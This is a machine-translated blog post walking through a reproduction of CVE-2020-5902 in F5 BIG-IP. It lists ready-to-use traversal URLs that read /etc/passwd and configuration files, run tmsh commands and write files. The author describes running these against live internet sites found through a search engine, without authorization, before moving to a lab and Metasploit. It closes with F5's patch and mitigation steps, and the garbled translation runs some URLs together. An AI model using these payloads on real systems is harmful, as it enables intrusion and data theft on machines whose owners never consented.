Shulou(Shulou.com)05/31 Report--

How to make a simple reproduction of CVE-2020-5902, I believe that many inexperienced people are at a loss about it. Therefore, this paper summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

Simple reproduction of CVE-2020-5902

2020 reported a loophole in f5 and thought to save the environment first, which might be used later.

1. Vulnerability description

Recently, F5 issued an official announcement to fix a remote code execution vulnerability (CVE-2020-5902) in the Traffic Management user Interface (TMUI). This vulnerability allows unauthenticated attackers or authenticated users to have network access to TMUI through the BIG-IP management port and / or their own IP to execute arbitrary system commands, create or delete files, disable services, and / or execute arbitrary Java code. The vulnerability may harm the entire system. At present, it has been detected that there is PoC on the network, and there have been attacks that take advantage of this vulnerability. It is recommended that users upgrade and protect them as soon as possible.

F5 BIG-IP is an application delivery platform of American F5 company which integrates network traffic management, application security management, load balancing and other functions.

Reference link: https://support.f5.com/csp/article/K52145254

2. Affected version

F5 BIG-IP 15.x known vulnerable versions 15.1.0,15.0.0

F5 BIG-IP 14.x known vulnerable versions 14.1.0-14.1.2

F5 BIG-IP 13.x known vulnerable versions 13.1.0-13.1.3

F5 BIG-IP 12.x known vulnerable versions 12.1.0-12.1.5

F5 BIG-IP 11.x known vulnerable versions 11.6.1-11.6.5

3. Vulnerability POC file read: https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hostshttps:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.licensehttps:///tmui/login.jsp/..; / tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.confRCE: https://[F5 Host] / tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin write file: https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test&content=1234564, reproduce

Because it has only been published for a few days, many vulnerable versions of the site can also be found on the Internet (in fact, it feels that most site will not be fixed later. ), tried to search here, found that there are still many, directly use foreign sites to try (after all, their own environment is still very troublesome, but do not know if the site with loopholes found is not a honeypot. )

Use fofa to search for the vulnerability version:

Find a beautiful country that can visit normally. After a little test, it was found that it would be successful.

Write to a file:

Try RCE to list users here, there is no output

Get shell online also wrote an article, because it is a real site, do not continue to try. Https://github.com/jas502n/CVE-2020-5902

Try to set up your own environment, version 14.1.2, because it seems that there is no loophole version on the official website. I randomly found an individual to download it on the Internet, but found that the account password of the web page seems to have been changed by him (the default is admin/admin), but it does not affect it, or you can use it directly:

Try msf, where I just started to download the module offline, and then manually added it to msf, but found that the module could not be loaded all the time, and finally did not solve it (it should be that my version of msf is too low to recognize the new module). In fact, the exp is already available in the new version of msf, so you don't have to manually add it and update the msf. (here we encounter a problem that msf cannot be started after an update, which is solved later. Let's sum up later.)

There was no success here. Try again later (the articles on the Internet are all the same, only wrote that there is this module, no one said that they successfully used exp to get shell. )

5 、 General patch recommendation: upgrade to the following version BIG-IP 15.x: 15.1.0.4BIG-IP 14.x: 14.1.2.6BIG-IP 13.x: 13.1.3.4BIG-IP 12.x: 12.1.5.2BIG-IP 11.x: 11.6.5.2 temporary patch recommendation: official recommendation can temporarily mitigate the impact through the following steps: 1) use the following command Log in to the corresponding system tmsh2) edit the configuration file edit / sys httpd all-properties3 of the httpd component as follows: include 'Redirect 404 /' 4) Save the file press ESC and enter: wq5) execute the command to refresh the configuration file save / sys config6) restart the httpd service restart sys service httpd and disable external IP access to the TMUI page Have you mastered how to make a simple reproduction of CVE-2020-5902? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.